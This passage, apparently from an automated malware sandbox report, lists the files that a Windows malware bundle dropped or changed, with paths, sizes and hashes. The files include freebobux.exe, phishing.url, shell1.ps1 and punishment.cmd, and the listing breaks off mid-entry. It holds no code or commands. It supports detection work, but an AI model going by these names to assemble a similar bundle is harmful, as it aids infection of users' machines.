                                                                                                                                                                                                d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\f3cb220f1aaa32ca310586e5f62dcab1.pack

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                894KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                34a66c4ec94dbdc4f84b4e6768aebf4e

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                d6f58b372433ad5e49a20c85466f9fb3627abff2

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\freebobux.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                779KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                794b00893a1b95ade9379710821ac1a4

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                85c7b2c351700457e3d6a21032dfd971ccb9b09d

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                5ac42d75e244d33856971120a25bd77f2c0712177384dfa61fb90c0e7790d34c

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                3774d4aed0cce7ed257d31a2bb65dda585d142c3c527dc32b40064d22d9d298dd183c52603561c9c1e96dd02737a8b2237c433cf7a74dccb0a25191446d60017

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\handler.cmd

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                225B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                c1e3b759a113d2e67d87468b079da7dc

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                3b280e1c66c7008b4f123b3be3aeb635d4ab17c3

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                b434261414e7c75437e8c47aba9a5b73fcb8cffbf0870998f50edc46084d1da5

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                20a1494027a5cf10f4cc71722a7a4e685fc7714ba08598dd150c545f644e139ddb200fb0b5517f5491a70d8644e90c8f60e8c457bc5d8eb0bb451120b40b8447

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\helper.vbs

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                26B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                7a97744bc621cf22890e2aebd10fd5c8

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                1147c8df448fe73da6aa6c396c5c53457df87620

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                89c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\install.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                878B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                1e800303c5590d814552548aaeca5ee1

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                1f57986f6794cd13251e2c8e17d9e00791209176

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                7d815f37d808bc350a3c49810491d5df0382409347ebae7a3064a535d485c534

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\jaffa.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                512KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                6b1b6c081780047b333e1e9fb8e473b6

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\jkka.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1002KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                42e4b26357361615b96afde69a5f0cc3

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                35346fe0787f14236296b469bf2fed5c24a1a53d

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\lupa.png

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                5KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                0a9d964a322ad35b99505a03e962e39a

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                1b5fed1e04fc22dea2ae82a07c4cfd25b043fc51

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                48cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\phishing.url

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                6f62e208aad51e2d5ef2a12427b36948

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                453eaf5afef9e82e2f50e0158e94cc1679b21bea

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\punishment.cmd

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                200B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                c8d2a5c6fe3c8efa8afc51e12cf9d864

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                5d94a4725a5eebb81cfa76100eb6e226fa583201

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                59e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\punishment.vbs

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                97B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                c38e912e4423834aba9e3ce5cd93114b

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                eab7bf293738d535bb447e375811d6daccc37a11

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                5df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\readme.md

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                167B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                5ae93516939cd47ccc5e99aa9429067c

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                3579225f7f8c066994d11b57c5f5f14f829a497f

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\regmess.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                536KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                5c4d7e6d02ec8f694348440b4b67cc45

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                be708ac13886757024dd2288ddd30221aed2ed86

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                71f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\scary.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                97cd39b10b06129cb419a72e1a1827b0

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                d05b2d7cfdf8b12746ffc7a59be36634852390bd

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                6bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\screenshot.png

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                266KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                de8ddeeb9df6efab37b7f52fe5fb4988

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                61f3aac4681b94928bc4c2ddb0f405b08a8ade46

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                47b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                6f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                797KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                5cb9ba5071d1e96c85c7f79254e54908

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                3470b95d97fb7f1720be55e033d479d6623aede2

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                53b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                70d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\shell1.ps1

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                356B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                29a3efd5dbe76b1c4bbc2964f9e15b08

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                02c2fc64c69ab63a7a8e9f0d5d55fe268c36c879

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\spinner.gif

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                44KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                324f8384507560259aaa182eb0c7f94a

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                3b86304767e541ddb32fdda2e9996d8dbeca16ed

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\stopwerfault.cmd

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                42B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                7eacd2dee5a6b83d43029bf620a0cafa

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                9d4561fa2ccf14e05265c288d8e7caa7a3df7354

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\the.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                764KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                e45dcabc64578b3cf27c5338f26862f1

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                1c376ec14025cabe24672620dcb941684fbd42b3

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                5d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\web.htm

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                367B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                f63c0947a1ee32cfb4c31fcbc7af3504

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                ee46256901fa8a5c80e4a859f0f486e84c61cbaa

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                bfe43062464da1f859ea3c2adace8ff251e72d840b32ef78c15b64c99f56d541

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                1f8666abfd3e5543710c6d2c5fb8c506d10d9f0f0306b25ba81176aa595a5afa8c288b522832f8ffe0a12873eaf2c2a0eff49ce4caa88400e8db7a8870a42184

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\web2.htm

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                684B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                1fc6bb77ac7589f2bffeaf09bcf7a0cf

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                028bdda6b433e79e9fbf021b94b89251ab840131

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                5d0147dc2b94b493d34efd322da66921f2d3d2b1cc7b0226ac1d494f99a933a1

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                6ef21162b85975fdd58628dcab0d610ce7acd8ab36820a09e9e8eb1e6b2d76060ed4ad2b48bdbe1e212ec84abb309e124a752e078f6747893a83562824ea6af6

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\web3.htm

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                904KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                9e118cccfa09666b2e1ab6e14d99183e

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                e6d3ab646aa941f0ca607f12b968c1e45c1164b4

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                d175dc88764d5ea95f19148d52fde1262125fedb41937dc2134f6f787ae26942

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                da02267196129ebeaa4c5ff74d63351260964fa8535343e3f10cd3fcf8f0e3d0a87c61adb84ec68b4770d3ef86535d11e4eacf6437c5f5fbe52c34aa6e07bd04

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\wim.dll

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                13.4MB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                9191cec82c47fb3f7249ff6c4e817b34

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                1d9854a78de332bc45c1712b0c3dac3fe6fda029

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                55ef4ff325d653a53add0ca6c41bc3979cdb4fc3ef1c677998dc2c9ea263c15b

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                2b482e947e26e636e7ed077b914788b1af8c28722efcbd481dd22940cfb771e38c3e2ed6c8f9208eb813085c7d4460978e13a5ef52441e7be7ada9f6414a6673

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\wimloader.dll

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                667KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                a67128f0aa1116529c28b45a8e2c8855

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                5fbaf2138ffc399333f6c6840ef1da5eec821c8e

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                8dc7e5dac39d618c98ff9d8f19ecb1be54a2214e1eb76e75bd6a27873131d665

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                660d0ced69c2c7dd002242c23c8d33d316850505fc30bad469576c97e53e59a32d13aa55b8b64459c180e7c76ea7f0dae785935f69d69bbd785ee7094bd9b94b

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\xcer.cer

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                a58d756a52cdd9c0488b755d46d4df71

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                0789b35fd5c2ef8142e6aae3b58fff14e4f13136

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                93fc03df79caa40fa8a637d153e8ec71340af70e62e947f90c4200ccba85e975

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                c31a9149701346a4c5843724c66c98aae6a1e712d800da7f2ba78ad9292ad5c7a0011575658819013d65a84853a74e548067c04c3cf0a71cda3ce8a29aad3423

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                d6bd210f227442b3362493d046cea233

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                ff286ac8370fc655aea0ef35e9cf0bfcb6d698de

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                288B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                869eff3b03559c07f1d51745255f9725

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                de1c7c0b062143cb2b33b89c3b5554b1ad585c86

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                3e8a46e1af22285cb344a7035eba52b5b65444dc4cb86f573b417fdcc5c9ed88

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                b07d7ce74a8792314c68b63cda3932f47737bc2c5763dabc0f60b5ea26d80c7caab81da0071a2c07e47b383db91185a1bc3877122fc0c3855a8884ba3f0478b4

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                a30fa9f580b7b1ec8cfd8fa8e7071113

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                a37d49b7f373e1a43d4038cc3b54e98dbca9e489

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                28cb71927ba796cd01d22b10f0f1d1cb94a5d5eefad5c92634b26e27955c67d6

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                6916a6348f5a86a3fc2d736f56e505143e32f642c592eb85948e73a625b0f54b7e12b6482f33a7b76181450c6ff8ae4e577c1c6855f4674957f345eebd10c43e

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                8fa7313f4645ef294a73576b33d1e428

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                cd3b2e6436e05efb6d187dd3ae37f713b23579f9

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                18b57f2f5f18aae343c76bb2616316bd28552de9b63d21606f33d671b42cd007

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                47443168c3bd832831a450f592adc5392db052ae1c5945f9b79f72d9ab6178ba9e311bd3ba06cd83920b8747c8fefd59195d76bd80a01e82576827ab385b343f

                                                                                                                                                                                              • C:\Users\Admin\Pictures\VjOImfJje2eyVxB4Qd03RaEy.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                588ec1603a527f59a9ecef1204568bf8

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                5e81d422cda0defb546bbbdaef8751c767df0f29

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                ba7bda2de36c9cab1835b62886b6df5ecbd930c653fac078246ce14c2c1c9b16

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                969baab4b3828c000e2291c5ebe718a8fc43b6ce118ccc743766162c3a623f9e32a66fb963672b73a7386d0881340ba247f0aef0046cacbe56a7926900c77821

                                                                                                                                                                                              • C:\Windows\SysWOW64\wfajqstsdo.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                512KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                454bcea37d1439bd0d3e06bc73bb8dfd

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                ab1d515a507df8c01371ed983a56fa91e36d39c7

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                8cdc3432e30c9326f55b8e28fdafd92d337347048c0841ca8021435662590b27

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                807d86eec22e8bf2c5675807caabfaa2931398154cbfbb04555b8f6c611db852dd7fb7599d35fbfafa9b645438d31ff8d092be7bae519014334a5de3a6654234

                                                                                                                                                                                              • C:\Windows\System32\DriverStore\Temp\{6be2c4c6-775e-5e48-bbc6-953cd1ac1bee}\SET44EF.tmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                10KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                ebbba34b954e31cbecf731232acfd5a0

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                a3fa17a0640f59705068e23b7f028f4f621f70d6

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                221487d538e1fda1cb54ce70ddea09f8a519e7112ef17b8bd504f483d9aa3952

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                ea24a593b3b16c1305a4ab73c5db8bc03d078c16e3072bbb2fb37eab8154aea70a266cfc4ea478bc1bf5b7566dd3cc2f7d7e85b46b7864981bcbf2e7d87f984e

                                                                                                                                                                                              • C:\Windows\System32\DriverStore\Temp\{6be2c4c6-775e-5e48-bbc6-953cd1ac1bee}\SET44FF.tmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                2KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                403d6b8ac68c827580c347449afd1e94

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                9f8303cb71b7b032bf7ff4377c067780d6cf30c1

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                025334d19394c41c24211ed36635fdd9f027fc23b654a4c00fabb8ffca568171

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                7c67eb1e680ab0924de20bef851ff05490e2a040ff0f0ff420d3181072d527ddcef030e1692aff686afe6868d407516b48257ed1a04c8dc94ffcd5bed7d2c618

                                                                                                                                                                                              • C:\Windows\System32\DriverStore\Temp\{6be2c4c6-775e-5e48-bbc6-953cd1ac1bee}\SET4500.tmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                31KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                698755c4e814626f067b338a4cbc3cef

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                2a2525417de84804c1487710d014d420322c4b8d

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                4faf45a52c2fe736b7656d306ad2a6bc1876c12fdbb20663e2f866f0d914bde3

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                1e106a77ae01fc3a64eeaf4194f07c673dcd083627679709084f7ad1259f50977c155e32630c502fa8b7fa9ac4ddf544433614df5597105c8ea07ee4644b5db6

                                                                                                                                                                                              • C:\Windows\System32\DriverStore\Temp\{fcb52cb6-9a3d-7548-895d-c2fe0dd27280}\SET4184.tmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                10KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                0b88937e24a1df7009e0a994e3d6bc28

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                adce740fad5a96274ae8ff89c449fbca9def58fa

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                84a8687365e531d0e434464bde88ef458f1b04330b2086ab1256dc2094b33d34

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                bca2b7a02b075a326889062ad282fd943c7b10c615410dcd334733bac39e3874c58ec82d3ea806784a986108e9e61ac0a0c0925107f7939ba90d1841fb5a3951

                                                                                                                                                                                              • C:\Windows\System32\DriverStore\Temp\{fcb52cb6-9a3d-7548-895d-c2fe0dd27280}\SET4185.tmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                95ce068c79c0f74c78b7e5b09c4072f0

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                380212c9adb530c4559685bf22266663b4f63f81

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                ba8ae153b8980e50320b4cbe790297aba97c1392068911cf2ec051a42dc4afa5

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                16cef98cb513d3f978efdaa3c90ab3147bb998c1b12af55b428e2e54411203b3175ead3fbce15ef2933d1ee48e6a8d79d7473356bef353453b75992f10b3d5b6

                                                                                                                                                                                              • C:\Windows\System32\DriverStore\Temp\{fcb52cb6-9a3d-7548-895d-c2fe0dd27280}\SET4186.tmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                32KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                914ddc54a23529414e080eee9e71a66e

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                64534aef53e4a57a57e5c886f28793da0b5dd578

                                                                                                                                                                                                SHA256

